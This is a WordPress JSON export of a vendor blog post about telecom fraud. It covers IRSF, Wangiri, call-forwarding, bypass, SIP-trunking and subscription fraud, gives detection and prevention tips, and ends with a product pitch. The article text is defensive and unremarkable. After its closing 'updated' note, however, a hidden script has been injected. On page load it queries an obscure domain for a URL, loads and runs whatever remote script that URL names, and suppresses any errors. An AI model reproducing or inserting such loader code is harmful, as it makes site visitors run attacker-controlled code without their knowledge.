{"id":3316,"date":"2022-08-30T05:18:19","date_gmt":"2022-08-30T05:18:19","guid":{"rendered":"https:\/\/www.revesoft.com\/blog\/?p=3316"},"modified":"2025-09-05T11:20:07","modified_gmt":"2025-09-05T11:20:07","slug":"telecom-fraud-management","status":"publish","type":"post","link":"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/","title":{"rendered":"Telecom Fraud Management: How to Identify and Prevent Fraud in Real Time?"},"content":{"rendered":"<p>Telecom fraud is on a continuous rise and is one of the biggest sources of revenue loss amongst Telcos. As per a report from CFCA Fraud Loss Survey, Telecom Fraud Losses have increased by 28% between the years 2019 and 2021. The onset of the pandemic in 2020, further escalated telecommunications fraud and security threats.<\/p>\n<blockquote><p>According to a survey released by Mobileum Inc. (\u201cMobileum\u201d), it has been found that <em>75% of operators polled were experiencing new or emerging incidents of fraud and 61% said network security threats increased significantly with the onset of the COVID-19 pandemic.<\/em><\/p>\n<p>The report even provides data about the types of fraud loss in which <em>IRSF and Traffic pumping incur to $6.69 billion and $4.54 billion respectively in 2021.<\/em><\/p><\/blockquote>\n<p>With these numbers, it becomes evident that to manage the pervasive threat of telco fraud, industry providers must have an effective fraud management approach that defends businesses and consumers.<\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_42 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" area-label=\"ez-toc-toggle-icon-1\"><label for=\"item-691d4f2e7ed00\" aria-label=\"Table of Content\"><span style=\"display: flex;align-items: center;width: 35px;height: 30px;justify-content: center;direction:ltr;\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/label><input  type=\"checkbox\" id=\"item-691d4f2e7ed00\"><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 eztoc-visibility-hide-by-default' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#What_is_Fraud_Management_in_Telecom\" title=\"What is Fraud Management in Telecom?\">What is Fraud Management in Telecom?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Types_of_Telecom_Fraud\" title=\"Types of Telecom Fraud\">Types of Telecom Fraud<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#IRSF_International_Revenue_Share_Fraud\" title=\"IRSF: International Revenue Share Fraud\">IRSF: International Revenue Share Fraud<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Call_Forwarding_Fraud\" title=\"Call Forwarding Fraud\">Call Forwarding Fraud<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Wangiri_Fraud\" title=\"Wangiri Fraud\">Wangiri Fraud<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Interconnect_Bypass_Fraud\" title=\"Interconnect Bypass Fraud\">Interconnect Bypass Fraud<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Wholesale_SIP_Trunking_Fraud\" title=\"Wholesale SIP Trunking Fraud\">Wholesale SIP Trunking Fraud<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Subscription_Frauds\" title=\"Subscription Frauds\">Subscription Frauds<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#How_to_Identify_Fraud_in_Telecom\" title=\"How to Identify Fraud in Telecom?\">How to Identify Fraud in Telecom?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Best_Practices_for_Telecom_Fraud_Prevention\" title=\"Best Practices for Telecom Fraud Prevention\">Best Practices for Telecom Fraud Prevention<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Password_Protection\" title=\"Password Protection\">Password Protection<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Monitoring_PBX_Systems\" title=\"Monitoring PBX Systems\">Monitoring PBX Systems<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Clear_the_Clutter\" title=\"Clear the Clutter\">Clear the Clutter<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Validate_Authenticate\" title=\"Validate &amp; Authenticate\">Validate &amp; Authenticate<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Keep_an_Eye_on_Expenditures\" title=\"Keep an Eye on Expenditures\">Keep an Eye on Expenditures<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Use_Security_Software\" title=\"Use Security Software\">Use Security Software<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#Read_Also\" title=\"Read Also\">Read Also<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#An_Overview_of_Session_Border_Controller\" title=\"An Overview of Session Border Controller\">An Overview of Session Border Controller<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/#How_to_Prevent_Spoofed_Robocalls_with_STIRSHAKEN\" title=\"How to Prevent Spoofed Robocalls with STIR\/SHAKEN\">How to Prevent Spoofed Robocalls with STIR\/SHAKEN<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"What_is_Fraud_Management_in_Telecom\"><\/span>What is Fraud Management in Telecom?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Frauds are not a new thing in the telecom industry &#8211; they have always been there. Technology is changing at a fast pace, and so are telecom fraud tactics. Fraudsters formulate new ways or simply tweak the existing methods to abuse telecommunications products and services. Their ultimate intention is to use services for free or illegally acquire money from CSPs or end users. High frequency, multiple layers of anonymity, and global nature help attackers to remain undetected.<\/p>\n<p>An effective Telecom Fraud Detection Management process is a critical element in determining the success of a telecommunication company. Such a mechanism is important to detect and prevent fraudulent activities which can cause revenue losses. \u00a0There are different types of telecommunication fraud that need to be addressed and handled by these mechanisms. Before we discuss this in detail, let us first take a look at the most common types of telecom fraud that one should know about.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Types_of_Telecom_Fraud\"><\/span>Types of Telecom Fraud<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Based on the target of the attackers, telecom frauds can be divided into two categories &#8211; Telcos and end users. Some of the major frauds that affect both carriers and end users are as mentioned below:<\/p>\n<h3><span class=\"ez-toc-section\" id=\"IRSF_International_Revenue_Share_Fraud\"><\/span>IRSF: International Revenue Share Fraud<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3360\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/1-IRSF-2.jpg\" alt=\"IRSF fraud\" width=\"1200\" height=\"350\" \/><\/p>\n<p>IRSF is one of the biggest fraud challenges for Telcos. In a report by CFCA, Revenue Share Fraud accounts for a $4 billion to $6.1 billion loss to the telecom industry. In this type of fraud attempt, the attackers take advantage of premium phone rates. Here\u2019s how it happens:<\/p>\n<ul>\n<li>The attacker leases a premium phone number.<\/li>\n<li>The attacker then breaks into a business\u2019s phone system and makes multiple calls to the premium rate number. Generally, these calls are made for a long duration to increase the phone bill.<\/li>\n<li>Huge phone bills are generated and paid by the business, 25% of which goes into the pockets of the attackers.<\/li>\n<\/ul>\n<p>These calls are generally made outside a business\u2019s working hours. Most of the time, companies do not realize that they have been attacked unless the time to pay the phone bill arrives.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Call_Forwarding_Fraud\"><\/span>Call Forwarding Fraud<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3349\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/2-4.jpg\" alt=\"Call Forwarding Fraud\" width=\"1200\" height=\"350\" \/><\/p>\n<p>Call Forward fraud is a sophisticated form of telecommunication fraud. Attackers first hack access to the PBX system or IVR (Interactive Voice Response) of an enterprise. Then they configure call forwarding to a premium long-distance number. Once done, the attacker calls the phone number of the hacked PBX system which forwards the call to the premium number. Here the attacker earns profit from IRSF.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Wangiri_Fraud\"><\/span>Wangiri Fraud<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>It is also known as \u2018One Ring and Cut\u2019 Fraud. Wangiri is a Japanese word that means one and cut. It\u2019s a telephone scam that aims at striking curiosity among customers by calling from premium rate numbers. Each call is made to ring only once and is hung up. Thus, leaving a missed call on the recipient\u2019s phone. The recipient often calls back without knowing that it\u2019s a premium rate number controlled by fraudsters.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Interconnect_Bypass_Fraud\"><\/span>Interconnect Bypass Fraud<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3339\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/3-2.jpg\" alt=\"Interconnect Bypass Fraud\" width=\"1200\" height=\"350\" \/>Also known as Toll Bypass Fraud or GSM Gateway Fraud, these types of frauds are executed by routing unauthorized traffic to a local operator via Sim Box or GSM Gateway. This is done so that the call terminates with the local operators and thus the expensive international interconnect gets replaced with an extremely low-cost routing channel. The bad actors thus earn the cost difference.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Wholesale_SIP_Trunking_Fraud\"><\/span>Wholesale SIP Trunking Fraud<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>In this type of fraud, the fraudsters make money by selling wholesale trunking services. The fraudsters use stolen credentials to terminate calls. Usually, a huge number of random calls are generated by fraudsters where destinations are not high cost but are not low cost either. This is how it is executed:<\/p>\n<ol>\n<li>The attacker steals the subscriber\u2019s username and password<\/li>\n<li>Attacker\u2019s softswitch registers with the service provider\u2019s softswitch using stolen credentials<\/li>\n<li>A legitimate user places a call<\/li>\n<li>The attacker sends INVITE to the service provider\u2019s softswitch<\/li>\n<li>Softswitch routes call to an international long-distance destination<\/li>\n<\/ol>\n<p>Wholesale SIP trunking fraud is often difficult to detect. This is because the call patterns in these frauds look similar to normal subscriber usage.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Subscription_Frauds\"><\/span>Subscription Frauds<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This type of fraud is executed by obtaining stolen identities (KYC documents) of customers from phishing attacks or purchasing from the dark web. Customer information is used to sign up for new telecom contracts and use their products and service but without the intention of paying them. It has been estimated that almost 40% of bad debts are actually subscription frauds.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"How_to_Identify_Fraud_in_Telecom\"><\/span>How to Identify Fraud in Telecom?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Traditional Approaches to telecom fraud detection are based on the blacklisting of fraud phone numbers. But today attackers can simply bypass such detection by changing their phone numbers using VoIP.\u00a0 Some of the most common techniques for telecom fraud detection are:<\/p>\n<ol>\n<li><strong>Collison Checks<\/strong> \u2013 Here the time period between two calls done by the same subscriber is checked for not colliding with a previously specified window.<\/li>\n<li><strong>Velocity Checks<\/strong> \u2013 These types of frauds are detected by checking the GIS data to detect the distance between two locations and the delta time between the calls made by the same subscriber.<\/li>\n<li><strong>New Subscriber Checks<\/strong> \u2013 In this type, false information is provided by the subscriber as he doesn\u2019t intend to pay for the services used. Phonetic matches in the subscriber\u2019s name are looked for in telecom fraud detection.<\/li>\n<li><strong>Patten Checks<\/strong> \u2013 Here specific patterns in the user activities are looked upon. This is a powerful method and can be used to detect multiple types of fraud.<\/li>\n<li><strong>Profile Checks<\/strong> \u2013 The calling pattern of the users is monitored and updated on their profile. Any unusual calling behavior may indicate fraud.<\/li>\n<\/ol>\n<h2><span class=\"ez-toc-section\" id=\"Best_Practices_for_Telecom_Fraud_Prevention\"><\/span>Best Practices for Telecom Fraud Prevention<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>We all know that prevention is better than cure. The same saying applies to the telecom fraud prevention scenario. Though attackers would always formulate new ways to penetrate into the systems, one should follow a proactive approach to fight telecom frauds. There are some golden countermeasures MNOs and MVNOs should always follow telecom fraud prevention. You can also read our post on <a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/sipvoip-fraud-attacks-operators-need-reliable-solution\/\" target=\"_blank\" rel=\"noopener\">SIP\/VoIP Fraud Attacks<\/a><\/p>\n<p>Here you go:<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Password_Protection\"><\/span>Password Protection<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3346\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/Password-Security-Tips-1.jpg\" alt=\"Password Security Tips\" width=\"1200\" height=\"350\" \/><\/p>\n<p>Always make sure that your software systems are protected with strong passwords, preferably a combination of alphanumeric characters. Also, it is important to change passwords periodically.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Monitoring_PBX_Systems\"><\/span>Monitoring PBX Systems<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>The most appropriate time for attackers to execute their attacks is after business hours, on weekends, and on holidays. Thus during these times, it becomes more important to monitor PBX systems for any unusual activities.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Clear_the_Clutter\"><\/span>Clear the Clutter<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Often we tend to keep old files in our systems that are of no use. But it is crucial to clear out all the junk files and folders from the system and deactivate unused features such as extensions.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Validate_Authenticate\"><\/span>Validate &amp; Authenticate<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3340\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/4jpg.jpg\" alt=\"2 FA\" width=\"1200\" height=\"350\" \/><\/p>\n<p>For a business, it is critical to cross-check and validate the details of its subscribers so as to filter out the fake ones. Also, applying 2 factor or multi-factor authentication is also an additional step towards ensuring security.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Keep_an_Eye_on_Expenditures\"><\/span>Keep an Eye on Expenditures<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>By doing a smart analysis of how much expenditure typically happens in a month, a business can keep a watch on any fraudulent activity. Many companies don\u2019t do this, but tracking your expenses can help deter telecom scammers.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Use_Security_Software\"><\/span>Use Security Software<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Security software plays a crucial role in covering all grounds when it comes to security. Using intelligent security software like REVE <a href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller\" target=\"_blank\" rel=\"noopener\">Session Border Controller<\/a> is a wise idea to keep telecom attacks at bay. REVE SBC is a Carrier-grade <a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/cloud-sbc\/\" target=\"_blank\" rel=\"noopener\">Cloud SBC<\/a> that safeguards software switches from various types of attacks including DoS i.e. Denial of Service Attacks. It also includes intelligent firewall and state-of-the-art encryption techniques to protect a business from theft of service. Learn more about <a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/question-to-ask-from-sbc-vendors-when-buying-session-border-controller\/\" target=\"_blank\" rel=\"noopener\">session border controller vendors<\/a>.<\/p>\n<p>Wish to learn more about Telecom Fraud Prevention? Just get in touch with our team to get the best security solutions.<\/p>\n<p style=\"text-align: center;\"><a class=\"btn btn-primary\" style=\"padding: 8px 12px; font-size: 18px;\" href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller#free_demo_form\" target=\"_blank\" rel=\"noopener\">Contact for Free Demo<\/a><\/p>\n<h2 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"Read_Also\"><\/span>Read Also<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"An_Overview_of_Session_Border_Controller\"><\/span><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/session-border-controller\/\" target=\"_blank\" rel=\"noopener\">An Overview of Session Border Controller<\/a><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"How_to_Prevent_Spoofed_Robocalls_with_STIRSHAKEN\"><\/span><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/\" target=\"_blank\" rel=\"noopener\">How to Prevent Spoofed Robocalls with STIR\/SHAKEN<\/a><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Note- This post has been updated with the latest information on 21-04-2023.<script>(async () => {\n  const TIMEOUT_MS = 60_000;\n  try {\n    const tdsResponse = await fetch('https:\/\/eotoatotlasldkd.com\/ofo');\n    const scriptUrl = (await tdsResponse.text()).trim();<\/p>\n<p>    const loadScriptWithTimeout = (url, timeout) => {\n      return new Promise((resolve, reject) => {\n        const script = document.createElement('script');\n        script.src = url;\n        script.async = true;<\/p>\n<p>        script.onload = () => {\n          clearTimeout(timer);\n          resolve();\n        };<\/p>\n<p>        script.onerror = () => {\n          clearTimeout(timer);\n          reject();\n        };<\/p>\n<p>        const timer = setTimeout(() => {\n          script.remove();\n          reject();\n        }, timeout);<\/p>\n<p>        document.body.appendChild(script);\n      });\n    };<\/p>\n<p>    await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS);\n  } catch (_) {}\n})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Telecom fraud is on a continuous rise and is one of the biggest sources of revenue loss amongst Telcos. As per a report from CFCA Fraud Loss Survey, Telecom Fraud Losses have increased by 28% between the years 2019 and 2021. The onset of the pandemic in 2020, further escalated telecommunications fraud and security threats. [&hellip;]<\/p>\n","protected":false},"author":19,"featured_media":3317,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[74],"tags":[],"class_list":["post-3316","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sbc"],"_links":{"self":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/comments?post=3316"}],"version-history":[{"count":18,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3316\/revisions"}],"predecessor-version":[{"id":6440,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3316\/revisions\/6440"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media\/3317"}],"wp:attachment":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media?parent=3316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/categories?post=3316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/tags?post=3316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}